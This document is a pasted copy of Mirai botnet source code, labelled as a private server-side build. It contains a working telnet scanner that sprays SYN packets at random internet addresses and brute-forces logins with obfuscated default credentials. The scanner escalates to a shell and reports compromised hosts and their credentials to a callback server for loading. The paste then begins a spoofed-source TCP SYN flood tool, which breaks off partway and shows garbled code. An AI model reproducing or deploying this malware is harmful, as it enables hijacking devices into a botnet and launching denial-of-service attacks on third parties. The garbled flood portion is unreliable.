Crisis Private Mirai Server side

1. #define _GNU_SOURCE
2.  
3. #ifdef Senthos_MIRAI
4.  
5. #ifdef DEBUG
6. #include <stdio.h>
7. #endif
8. #include <unistd.h>
9. #include <stdlib.h>
10. #include <sys/socket.h>
11. #include <arpa/inet.h>
12. #include <sys/select.h>
13. #include <sys/types.h>
14. #include <time.h>
15. #include <fcntl.h>
16. #include <signal.h>
17. #include <errno.h>
18. #include <string.h>
19. #include <linux/ip.h>
20. #include <linux/tcp.h>
21.  
22. #include "includes.h"
23. #include "scanner.h"
24. #include "table.h"
25. #include "rand.h"
26. #include "util.h"
27. #include "checksum.h"
28. #include "resolv.h"
29.  
30. int scanner_pid, rsck, rsck_out, auth_table_len = 0;
31. char scanner_rawpkt[sizeof (struct iphdr) + sizeof (struct tcphdr)] = {0};
32. struct scanner_auth *auth_table = NULL;
33. struct scanner_connection *conn_table;
34. uint16_t auth_table_max_weight = 0;
35. uint32_t fake_time = 0;
36.  
37. int recv_strip_null(int sock, void *buf, int len, int flags)
38. {
39. int ret = recv(sock, buf, len, flags);
40.  
41. if (ret > 0)
42. {
43. int i = 0;
44.  
45. for(i = 0; i < ret; i++)
46. {
47. if (((char *)buf)[i] == 0x00)
48. {
49. ((char *)buf)[i] = 'A';
50. }
51. }
52. }
53.  
54. return ret;
55. }
56.  
57. void scanner_init(void)
58. {
59. int i;
60. uint16_t source_port;
61. struct iphdr *iph;
62. struct tcphdr *tcph;
63.  
64. // Let parent continue on main thread
65. scanner_pid = fork();
66. if (scanner_pid > 0 || scanner_pid == -1)
67. return;
68.  
69. LOCAL_ADDR = util_local_addr();
70.  
71. rand_init();
72. fake_time = time(NULL);
73. conn_table = calloc(SCANNER_MAX_CONNS, sizeof (struct scanner_connection));
74. for (i = 0; i < SCANNER_MAX_CONNS; i++)
75. {
76. conn_table[i].state = SC_CLOSED;
77. conn_table[i].fd = -1;
78. }
79.  
80. // Set up raw socket scanning and payload
81. if ((rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
82. {
83. #ifdef DEBUG
84. printf("[scanner] Failed to initialize raw socket, cannot scan\n");
85. #endif
86. exit(0);
87. }
88. fcntl(rsck, F_SETFL, O_NONBLOCK | fcntl(rsck, F_GETFL, 0));
89. i = 1;
90. if (setsockopt(rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof (i)) != 0)
91. {
92. #ifdef DEBUG
93. printf("[scanner] Failed to set IP_HDRINCL, cannot scan\n");
94. #endif
95. close(rsck);
96. exit(0);
97. }
98.  
99. do
100. {
101. source_port = rand_next() & 0xffff;
102. }
103. while (ntohs(source_port) < 1024);
104.  
105. iph = (struct iphdr *)scanner_rawpkt;
106. tcph = (struct tcphdr *)(iph + 1);
107.  
108. // Set up IPv4 header
109. iph->ihl = 5;
110. iph->version = 4;
111. iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr));
112. iph->id = rand_next();
113. iph->ttl = 64;
114. iph->protocol = IPPROTO_TCP;
115.  
116. // Set up TCP header
117. tcph->dest = htons(23);
118. tcph->source = source_port;
119. tcph->doff = 5;
120. tcph->window = rand_next() & 0xffff;
121. tcph->syn = TRUE;
122.  
123. // Set up passwords
124. add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10);
125. #ifdef DEBUG
126. printf("[scanner] Scanner process initialized. Scanning started.\n");
127. #endif
128.  
129. // Main logic loop
130. while (TRUE)
131. {
132. fd_set fdset_rd, fdset_wr;
133. struct scanner_connection *conn;
134. struct timeval tim;
135. int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
136.  
137. // Spew out SYN to try and get a response
138. if (fake_time != last_spew)
139. {
140. last_spew = fake_time;
141.  
142. for (i = 0; i < SCANNER_RAW_PPS; i++)
143. {
144. struct sockaddr_in paddr = {0};
145. struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
146. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
147.  
148. iph->id = rand_next();
149. iph->saddr = LOCAL_ADDR;
150. iph->daddr = get_random_ip();
151. iph->check = 0;
152. iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
153.  
154. if (i % 10 == 0)
155. {
156. tcph->dest = htons(2323);
157. }
158. else
159. {
160. tcph->dest = htons(23);
161. }
162. tcph->seq = iph->daddr;
163. tcph->check = 0;
164. tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));
165.  
166. paddr.sin_family = AF_INET;
167. paddr.sin_addr.s_addr = iph->daddr;
168. paddr.sin_port = tcph->dest;
169.  
170. sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
171. }
172. }
173.  
174. // Read packets from raw socket to get SYN+ACKs
175. last_avail_conn = 0;
176. while (TRUE)
177. {
178. int n;
179. char dgram[1514];
180. struct iphdr *iph = (struct iphdr *)dgram;
181. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
182. struct scanner_connection *conn;
183.  
184. errno = 0;
185. n = recvfrom(rsck, dgram, sizeof (dgram), MSG_NOSIGNAL, NULL, NULL);
186. if (n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
187. break;
188.  
189. if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))
190. continue;
191. if (iph->daddr != LOCAL_ADDR)
192. continue;
193. if (iph->protocol != IPPROTO_TCP)
194. continue;
195. if (tcph->source != htons(23) && tcph->source != htons(2323))
196. continue;
197. if (tcph->dest != source_port)
198. continue;
199. if (!tcph->syn)
200. continue;
201. if (!tcph->ack)
202. continue;
203. if (tcph->rst)
204. continue;
205. if (tcph->fin)
206. continue;
207. if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
208. continue;
209.  
210. conn = NULL;
211. for (n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)
212. {
213. if (conn_table[n].state == SC_CLOSED)
214. {
215. conn = &conn_table[n];
216. last_avail_conn = n;
217. break;
218. }
219. }
220.  
221. // If there were no slots, then no point reading any more
222. if (conn == NULL)
223. break;
224.  
225. conn->dst_addr = iph->saddr;
226. conn->dst_port = tcph->source;
227. setup_connection(conn);
228. #ifdef DEBUG
229. printf("[scanner] FD%d Attempting to brute found IP %d.%d.%d.%d\n", conn->fd, iph->saddr & 0xff, (iph->saddr >> 8) & 0xff, (iph->saddr >> 16) & 0xff, (iph->saddr >> 24) & 0xff);
230. #endif
231. }
232.  
233. // Load file descriptors into fdsets
234. FD_ZERO(&fdset_rd);
235. FD_ZERO(&fdset_wr);
236. for (i = 0; i < SCANNER_MAX_CONNS; i++)
237. {
238. int timeout;
239.  
240. conn = &conn_table[i];
241. timeout = (conn->state > SC_CONNECTING ? 30 : 5);
242.  
243. if (conn->state != SC_CLOSED && (fake_time - conn->last_recv) > timeout)
244. {
245. #ifdef DEBUG
246. printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
247. #endif
248. close(conn->fd);
249. conn->fd = -1;
250.  
251. // Retry
252. if (conn->state > SC_HANDLE_IACS) // If we were at least able to connect, try again
253. {
254. if (++(conn->tries) == 10)
255. {
256. conn->tries = 0;
257. conn->state = SC_CLOSED;
258. }
259. else
260. {
261. setup_connection(conn);
262. #ifdef DEBUG
263. printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
264. #endif
265. }
266. }
267. else
268. {
269. conn->tries = 0;
270. conn->state = SC_CLOSED;
271. }
272. continue;
273. }
274.  
275. if (conn->state == SC_CONNECTING)
276. {
277. FD_SET(conn->fd, &fdset_wr);
278. if (conn->fd > mfd_wr)
279. mfd_wr = conn->fd;
280. }
281. else if (conn->state != SC_CLOSED)
282. {
283. FD_SET(conn->fd, &fdset_rd);
284. if (conn->fd > mfd_rd)
285. mfd_rd = conn->fd;
286. }
287. }
288.  
289. tim.tv_usec = 0;
290. tim.tv_sec = 1;
291. nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
292. fake_time = time(NULL);
293.  
294. for (i = 0; i < SCANNER_MAX_CONNS; i++)
295. {
296. conn = &conn_table[i];
297.  
298. if (conn->fd == -1)
299. continue;
300.  
301. if (FD_ISSET(conn->fd, &fdset_wr))
302. {
303. int err = 0, ret = 0;
304. socklen_t err_len = sizeof (err);
305.  
306. ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
307. if (err == 0 && ret == 0)
308. {
309. conn->state = SC_HANDLE_IACS;
310. conn->auth = random_auth_entry();
311. conn->rdbuf_pos = 0;
312. #ifdef DEBUG
313. printf("[scanner] FD%d connected. Trying %s:%s\n", conn->fd, conn->auth->username, conn->auth->password);
314. #endif
315. }
316. else
317. {
318. #ifdef DEBUG
319. printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);
320. #endif
321. close(conn->fd);
322. conn->fd = -1;
323. conn->tries = 0;
324. conn->state = SC_CLOSED;
325. continue;
326. }
327. }
328.  
329. if (FD_ISSET(conn->fd, &fdset_rd))
330. {
331. while (TRUE)
332. {
333. int ret;
334.  
335. if (conn->state == SC_CLOSED)
336. break;
337.  
338. if (conn->rdbuf_pos == SCANNER_RDBUF_SIZE)
339. {
340. memmove(conn->rdbuf, conn->rdbuf + SCANNER_HACK_DRAIN, SCANNER_RDBUF_SIZE - SCANNER_HACK_DRAIN);
341. conn->rdbuf_pos -= SCANNER_HACK_DRAIN;
342. }
343. errno = 0;
344. ret = recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
345. if (ret == 0)
346. {
347. #ifdef DEBUG
348. printf("[scanner] FD%d connection gracefully closed\n", conn->fd);
349. #endif
350. errno = ECONNRESET;
351. ret = -1; // Fall through to closing connection below
352. }
353. if (ret == -1)
354. {
355. if (errno != EAGAIN && errno != EWOULDBLOCK)
356. {
357. #ifdef DEBUG
358. printf("[scanner] FD%d lost connection\n", conn->fd);
359. #endif
360. close(conn->fd);
361. conn->fd = -1;
362.  
363. // Retry
364. if (++(conn->tries) >= 10)
365. {
366. conn->tries = 0;
367. conn->state = SC_CLOSED;
368. }
369. else
370. {
371. setup_connection(conn);
372. #ifdef DEBUG
373. printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
374. #endif
375. }
376. }
377. break;
378. }
379. conn->rdbuf_pos += ret;
380. conn->last_recv = fake_time;
381.  
382. while (TRUE)
383. {
384. int consumed = 0;
385.  
386. switch (conn->state)
387. {
388. case SC_HANDLE_IACS:
389. if ((consumed = consume_iacs(conn)) > 0)
390. {
391. conn->state = SC_WAITING_USERNAME;
392. #ifdef DEBUG
393. printf("[scanner] FD%d finished telnet negotiation\n", conn->fd);
394. #endif
395. }
396. break;
397. case SC_WAITING_USERNAME:
398. if ((consumed = consume_user_prompt(conn)) > 0)
399. {
400. send(conn->fd, conn->auth->username, conn->auth->username_len, MSG_NOSIGNAL);
401. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
402. conn->state = SC_WAITING_PASSWORD;
403. #ifdef DEBUG
404. printf("[scanner] FD%d received username prompt\n", conn->fd);
405. #endif
406. }
407. break;
408. case SC_WAITING_PASSWORD:
409. if ((consumed = consume_pass_prompt(conn)) > 0)
410. {
411. #ifdef DEBUG
412. printf("[scanner] FD%d received password prompt\n", conn->fd);
413. #endif
414.  
415. // Send password
416. send(conn->fd, conn->auth->password, conn->auth->password_len, MSG_NOSIGNAL);
417. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
418.  
419. conn->state = SC_WAITING_PASSWD_RESP;
420. }
421. break;
422. case SC_WAITING_PASSWD_RESP:
423. if ((consumed = consume_any_prompt(conn)) > 0)
424. {
425. char *tmp_str;
426. int tmp_len;
427.  
428. #ifdef DEBUG
429. printf("[scanner] FD%d received shell prompt\n", conn->fd);
430. #endif
431.  
432. // Send enable / system / shell / sh to session to drop into shell if needed
433. table_unlock_val(TABLE_SCAN_ENABLE);
434. tmp_str = table_retrieve_val(TABLE_SCAN_ENABLE, &tmp_len);
435. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
436. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
437. table_lock_val(TABLE_SCAN_ENABLE);
438. conn->state = SC_WAITING_ENABLE_RESP;
439. }
440. break;
441. case SC_WAITING_ENABLE_RESP:
442. if ((consumed = consume_any_prompt(conn)) > 0)
443. {
444. char *tmp_str;
445. int tmp_len;
446.  
447. #ifdef DEBUG
448. printf("[scanner] FD%d received sh prompt\n", conn->fd);
449. #endif
450.  
451. table_unlock_val(TABLE_SCAN_SYSTEM);
452. tmp_str = table_retrieve_val(TABLE_SCAN_SYSTEM, &tmp_len);
453. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
454. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
455. table_lock_val(TABLE_SCAN_SYSTEM);
456.  
457. conn->state = SC_WAITING_SYSTEM_RESP;
458. }
459. break;
460. case SC_WAITING_SYSTEM_RESP:
461. if ((consumed = consume_any_prompt(conn)) > 0)
462. {
463. char *tmp_str;
464. int tmp_len;
465.  
466. #ifdef DEBUG
467. printf("[scanner] FD%d received sh prompt\n", conn->fd);
468. #endif
469.  
470. table_unlock_val(TABLE_SCAN_SHELL);
471. tmp_str = table_retrieve_val(TABLE_SCAN_SHELL, &tmp_len);
472. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
473. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
474. table_lock_val(TABLE_SCAN_SHELL);
475.  
476. conn->state = SC_WAITING_SHELL_RESP;
477. }
478. break;
479. case SC_WAITING_SHELL_RESP:
480. if ((consumed = consume_any_prompt(conn)) > 0)
481. {
482. char *tmp_str;
483. int tmp_len;
484.  
485. #ifdef DEBUG
486. printf("[scanner] FD%d received enable prompt\n", conn->fd);
487. #endif
488.  
489. table_unlock_val(TABLE_SCAN_SH);
490. tmp_str = table_retrieve_val(TABLE_SCAN_SH, &tmp_len);
491. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
492. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
493. table_lock_val(TABLE_SCAN_SH);
494.  
495. conn->state = SC_WAITING_SH_RESP;
496. }
497. break;
498. case SC_WAITING_SH_RESP:
499. if ((consumed = consume_any_prompt(conn)) > 0)
500. {
501. char *tmp_str;
502. int tmp_len;
503.  
504. #ifdef DEBUG
505. printf("[scanner] FD%d received sh prompt\n", conn->fd);
506. #endif
507.  
508. // Send query string
509. table_unlock_val(TABLE_SCAN_QUERY);
510. tmp_str = table_retrieve_val(TABLE_SCAN_QUERY, &tmp_len);
511. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
512. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
513. table_lock_val(TABLE_SCAN_QUERY);
514.  
515. conn->state = SC_WAITING_TOKEN_RESP;
516. }
517. break;
518. case SC_WAITING_TOKEN_RESP:
519. consumed = consume_resp_prompt(conn);
520. if (consumed == -1)
521. {
522. #ifdef DEBUG
523. printf("[scanner] FD%d invalid username/password combo\n", conn->fd);
524. #endif
525. close(conn->fd);
526. conn->fd = -1;
527.  
528. // Retry
529. if (++(conn->tries) == 10)
530. {
531. conn->tries = 0;
532. conn->state = SC_CLOSED;
533. }
534. else
535. {
536. setup_connection(conn);
537. #ifdef DEBUG
538. printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
539. #endif
540. }
541. }
542. else if (consumed > 0)
543. {
544. char *tmp_str;
545. int tmp_len;
546. #ifdef DEBUG
547. printf("[scanner] FD%d Found verified working telnet\n", conn->fd);
548. #endif
549. report_working(conn->dst_addr, conn->dst_port, conn->auth);
550. close(conn->fd);
551. conn->fd = -1;
552. conn->state = SC_CLOSED;
553. }
554. break;
555. default:
556. consumed = 0;
557. break;
558. }
559.  
560. // If no data was consumed, move on
561. if (consumed == 0)
562. break;
563. else
564. {
565. if (consumed > conn->rdbuf_pos)
566. consumed = conn->rdbuf_pos;
567.  
568. conn->rdbuf_pos -= consumed;
569. memmove(conn->rdbuf, conn->rdbuf + consumed, conn->rdbuf_pos);
570. }
571. }
572. }
573. }
574. }
575. }
576. }
577.  
578. void scanner_kill(void)
579. {
580. kill(scanner_pid, 9);
581. }
582.  
583. static void setup_connection(struct scanner_connection *conn)
584. {
585. struct sockaddr_in addr = {0};
586.  
587. if (conn->fd != -1)
588. close(conn->fd);
589. if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
590. {
591. #ifdef DEBUG
592. printf("[scanner] Failed to call socket()\n");
593. #endif
594. return;
595. }
596.  
597. conn->rdbuf_pos = 0;
598. util_zero(conn->rdbuf, sizeof(conn->rdbuf));
599.  
600. fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
601.  
602. addr.sin_family = AF_INET;
603. addr.sin_addr.s_addr = conn->dst_addr;
604. addr.sin_port = conn->dst_port;
605.  
606. conn->last_recv = fake_time;
607. conn->state = SC_CONNECTING;
608. connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
609. }
610.  
611. static ipv4_t get_random_ip(void)
612. {
613. uint32_t tmp;
614. uint8_t o1, o2, o3, o4;
615.  
616. do
617. {
618. tmp = rand_next();
619.  
620. o1 = tmp & 0xff;
621. o2 = (tmp >> 8) & 0xff;
622. o3 = (tmp >> 16) & 0xff;
623. o4 = (tmp >> 24) & 0xff;
624. }
625. while (o1 == 127 || // 127.0.0.0/8 - Loopback
626. (o1 == 0) || // 0.0.0.0/8 - Invalid address space
627. (o1 == 3) || // 3.0.0.0/8 - General Electric Company
628. (o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company
629. (o1 == 56) || // 56.0.0.0/8 - US Postal Service
630. (o1 == 10) || // 10.0.0.0/8 - Internal network
631. (o1 == 192 && o2 == 168) || // 192.168.0.0/16 - Internal network
632. (o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.0.0/14 - Internal network
633. (o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved
634. (o1 == 169 && o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved
635. (o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA Special use
636. (o1 >= 224) || // 224.*.*.*+ - Multicast
637. (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
638. );
639.  
640. return INET_ADDR(o1,o2,o3,o4);
641. }
642.  
643. static int consume_iacs(struct scanner_connection *conn)
644. {
645. int consumed = 0;
646. uint8_t *ptr = conn->rdbuf;
647.  
648. while (consumed < conn->rdbuf_pos)
649. {
650. int i;
651.  
652. if (*ptr != 0xff)
653. break;
654. else if (*ptr == 0xff)
655. {
656. if (!can_consume(conn, ptr, 1))
657. break;
658. if (ptr[1] == 0xff)
659. {
660. ptr += 2;
661. consumed += 2;
662. continue;
663. }
664. else if (ptr[1] == 0xfd)
665. {
666. uint8_t tmp1[3] = {255, 251, 31};
667. uint8_t tmp2[9] = {255, 250, 31, 0, 80, 0, 24, 255, 240};
668.  
669. if (!can_consume(conn, ptr, 2))
670. break;
671. if (ptr[2] != 31)
672. goto iac_wont;
673.  
674. ptr += 3;
675. consumed += 3;
676.  
677. send(conn->fd, tmp1, 3, MSG_NOSIGNAL);
678. send(conn->fd, tmp2, 9, MSG_NOSIGNAL);
679. }
680. else
681. {
682. iac_wont:
683.  
684. if (!can_consume(conn, ptr, 2))
685. break;
686.  
687. for (i = 0; i < 3; i++)
688. {
689. if (ptr[i] == 0xfd)
690. ptr[i] = 0xfc;
691. else if (ptr[i] == 0xfb)
692. ptr[i] = 0xfd;
693. }
694.  
695. send(conn->fd, ptr, 3, MSG_NOSIGNAL);
696. ptr += 3;
697. consumed += 3;
698. }
699. }
700. }
701.  
702. return consumed;
703. }
704.  
705. static int consume_any_prompt(struct scanner_connection *conn)
706. {
707. char *pch;
708. int i, prompt_ending = -1;
709.  
710. for (i = conn->rdbuf_pos - 1; i > 0; i--)
711. {
712. if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
713. {
714. prompt_ending = i + 1;
715. break;
716. }
717. }
718.  
719. if (prompt_ending == -1)
720. return 0;
721. else
722. return prompt_ending;
723. }
724.  
725. static int consume_user_prompt(struct scanner_connection *conn)
726. {
727. char *pch;
728. int i, prompt_ending = -1;
729.  
730. for (i = conn->rdbuf_pos - 1; i > 0; i--)
731. {
732. if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
733. {
734. prompt_ending = i + 1;
735. break;
736. }
737. }
738.  
739. if (prompt_ending == -1)
740. {
741. int tmp;
742.  
743. if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "ogin", 4)) != -1)
744. prompt_ending = tmp;
745. else if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "enter", 5)) != -1)
746. prompt_ending = tmp;
747. }
748.  
749. if (prompt_ending == -1)
750. return 0;
751. else
752. return prompt_ending;
753. }
754.  
755. static int consume_pass_prompt(struct scanner_connection *conn)
756. {
757. char *pch;
758. int i, prompt_ending = -1;
759.  
760. for (i = conn->rdbuf_pos - 1; i > 0; i--)
761. {
762. if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#')
763. {
764. prompt_ending = i + 1;
765. break;
766. }
767. }
768.  
769. if (prompt_ending == -1)
770. {
771. int tmp;
772.  
773. if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "assword", 7)) != -1)
774. prompt_ending = tmp;
775. }
776.  
777. if (prompt_ending == -1)
778. return 0;
779. else
780. return prompt_ending;
781. }
782.  
783. static int consume_resp_prompt(struct scanner_connection *conn)
784. {
785. char *tkn_resp;
786. int prompt_ending, len;
787.  
788. table_unlock_val(TABLE_SCAN_NCORRECT);
789. tkn_resp = table_retrieve_val(TABLE_SCAN_NCORRECT, &len);
790. if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1) != -1)
791. {
792. table_lock_val(TABLE_SCAN_NCORRECT);
793. return -1;
794. }
795. table_lock_val(TABLE_SCAN_NCORRECT);
796.  
797. table_unlock_val(TABLE_SCAN_RESP);
798. tkn_resp = table_retrieve_val(TABLE_SCAN_RESP, &len);
799. prompt_ending = util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1);
800. table_lock_val(TABLE_SCAN_RESP);
801.  
802. if (prompt_ending == -1)
803. return 0;
804. else
805. return prompt_ending;
806. }
807.  
808. static void add_auth_entry(char *enc_user, char *enc_pass, uint16_t weight)
809. {
810. int tmp;
811.  
812. auth_table = realloc(auth_table, (auth_table_len + 1) * sizeof (struct scanner_auth));
813. auth_table[auth_table_len].username = deobf(enc_user, &tmp);
814. auth_table[auth_table_len].username_len = (uint8_t)tmp;
815. auth_table[auth_table_len].password = deobf(enc_pass, &tmp);
816. auth_table[auth_table_len].password_len = (uint8_t)tmp;
817. auth_table[auth_table_len].weight_min = auth_table_max_weight;
818. auth_table[auth_table_len++].weight_max = auth_table_max_weight + weight;
819. auth_table_max_weight += weight;
820. }
821.  
822. static struct scanner_auth *random_auth_entry(void)
823. {
824. int i;
825. uint16_t r = (uint16_t)(rand_next() % auth_table_max_weight);
826.  
827. for (i = 0; i < auth_table_len; i++)
828. {
829. if (r < auth_table[i].weight_min)
830. continue;
831. else if (r < auth_table[i].weight_max)
832. return &auth_table[i];
833. }
834.  
835. return NULL;
836. }
837.  
838. static void report_working(ipv4_t daddr, uint16_t dport, struct scanner_auth *auth)
839. {
840. struct sockaddr_in addr;
841. int pid = fork(), fd;
842. struct resolv_entries *entries = NULL;
843.  
844. if (pid > 0 || pid == -1)
845. return;
846.  
847. if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
848. {
849. #ifdef DEBUG
850. printf("[report] Failed to call socket()\n");
851. #endif
852. exit(0);
853. }
854.  
855. table_unlock_val(TABLE_SCAN_CB_DOMAIN);
856. table_unlock_val(TABLE_SCAN_CB_PORT);
857.  
858. entries = resolv_lookup(table_retrieve_val(TABLE_SCAN_CB_DOMAIN, NULL));
859. if (entries == NULL)
860. {
861. #ifdef DEBUG
862. printf("[report] Failed to resolve report address\n");
863. #endif
864. return;
865. }
866. addr.sin_family = AF_INET;
867. addr.sin_addr.s_addr = entries->addrs[rand_next() % entries->addrs_len];
868. addr.sin_port = *((port_t *)table_retrieve_val(TABLE_SCAN_CB_PORT, NULL));
869. resolv_entries_free(entries);
870.  
871. table_lock_val(TABLE_SCAN_CB_DOMAIN);
872. table_lock_val(TABLE_SCAN_CB_PORT);
873.  
874. if (connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in)) == -1)
875. {
876. #ifdef DEBUG
877. printf("[report] Failed to connect to scanner callback!\n");
878. #endif
879. close(fd);
880. exit(0);
881. }
882.  
883. uint8_t zero = 0;
884. send(fd, &zero, sizeof (uint8_t), MSG_NOSIGNAL);
885. send(fd, &daddr, sizeof (ipv4_t), MSG_NOSIGNAL);
886. send(fd, &dport, sizeof (uint16_t), MSG_NOSIGNAL);
887. send(fd, &(auth->username_len), sizeof (uint8_t), MSG_NOSIGNAL);
888. send(fd, auth->username, auth->username_len, MSG_NOSIGNAL);
889. send(fd, &(auth->password_len), sizeof (uint8_t), MSG_NOSIGNAL);
890. send(fd, auth->password, auth->password_len, MSG_NOSIGNAL);
891.  
892. #ifdef DEBUG
893. printf("[report] Send scan result to loader\n");
894. #endif
895.  
896. close(fd);
897. exit(0);
898. }
899.  
900. static char *deobf(char *str, int *len)
901. {
902. int i;
903. char *cpy;
904.  
905. *len = util_strlen(str);
906. cpy = malloc(*len + 1);
907.  
908. util_memcpy(cpy, str, *len + 1);
909.  
910. for (i = 0; i < *len; i++)
911. {
912. cpy[i] ^= 0xDE;
913. cpy[i] ^= 0xAD;
914. cpy[i] ^= 0xBE;
915. cpy[i] ^= 0xEF;
916. }
917.  
918. return cpy;
919. }
920. #include <pthread.h>#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys socket.h="">#include <netinet ip.h="">#include <netinet tcp.h="">#include <time.h>#define MAX_PACKET_SIZE 4096
921. #define PHI 0x9e3779b9
922.  
923. static unsigned long int Q[4096], c = 362436;
924. static unsigned int floodport;
925. volatile int limiter;
926. volatile unsigned int pps;
927. volatile unsigned int sleeptime = 100;
928.  
929. void init_rand(unsigned long int x)
930. {
931. int i;
932. Q[0] = x;
933. Q[1] = x + PHI;
934. Q[2] = x + PHI + PHI;
935. for (i = 3; i < 4096; i++){ Q _= Q _^ Q _^ PHI ^ i; }
936. }
937. unsigned long int rand_cmwc(void)
938. {
939. unsigned long long int t, a = 18782LL;
940. static unsigned long int i = 4095;
941. unsigned long int x, r = 0xfffffffe;
942. i = (i + 1) & 4095;
943. t = a * Q _+ c;
944. c = (t >> 32);
945. x = t + c;
946. if (x < c) {
947. x++;
948. c++;
949. }
950. return (Q _= r - x);
951. }
952. unsigned short csum (unsigned short *buf, int count)
953. {
954. register unsigned long sum = 0;
955. while( count > 1 ) { sum += *buf++; count -= 2; }
956. if(count > 0) { sum += *(unsigned char *)buf; }
957. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
958. return (unsigned short)(~sum);
959. }
960.  
961. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
962.  
963. struct tcp_pseudo
964. {
965. unsigned long src_addr;
966. unsigned long dst_addr;
967. unsigned char zero;
968. unsigned char proto;
969. unsigned short length;
970. } pseudohead;
971. unsigned short total_len = iph->tot_len;
972. pseudohead.src_addr=iph->saddr;
973. pseudohead.dst_addr=iph->daddr;
974. pseudohead.zero=0;
975. pseudohead.proto=IPPROTO_TCP;
976. pseudohead.length=htons(sizeof(struct tcphdr));
977. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
978. unsigned short *tcp = malloc(totaltcp_len);
979. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
980. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
981. unsigned short output = csum(tcp,totaltcp_len);
982. free(tcp);
983. return output;
984. }
985.  
986. void setup_ip_header(struct iphdr *iph)
987. {
988. char ip[17];
989. snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
990. iph->ihl = 5;
991. iph->version = 4;
992. iph->tos = 0;
993. iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
994. iph->id = htonl(rand()%54321);
995. iph->frag_off = 0;
996. iph->ttl = MAXTTL;
997. iph->protocol = 6;
998. iph->check = 0;
999. iph->saddr = inet_addr(ip);
1000. }
1001.  
1002. void setup_tcp_header(struct tcphdr *tcph)
1003. {
1004. tcph->source = htons(rand()%65535);
1005. tcph->seq = rand();
1006. tcph->ack_seq = 0;
1007. tcph->res2 = 0;
1008. tcph->doff = 5;
1009. tcph->syn = 1;
1010. tcph->window = htonl(65535);
1011. tcph->check = 0;
1012. tcph->urg_ptr = 0;
1013. }
1014.  
1015. void *flood(void *par1)
1016. {
1017. char *td = (char *)par1;
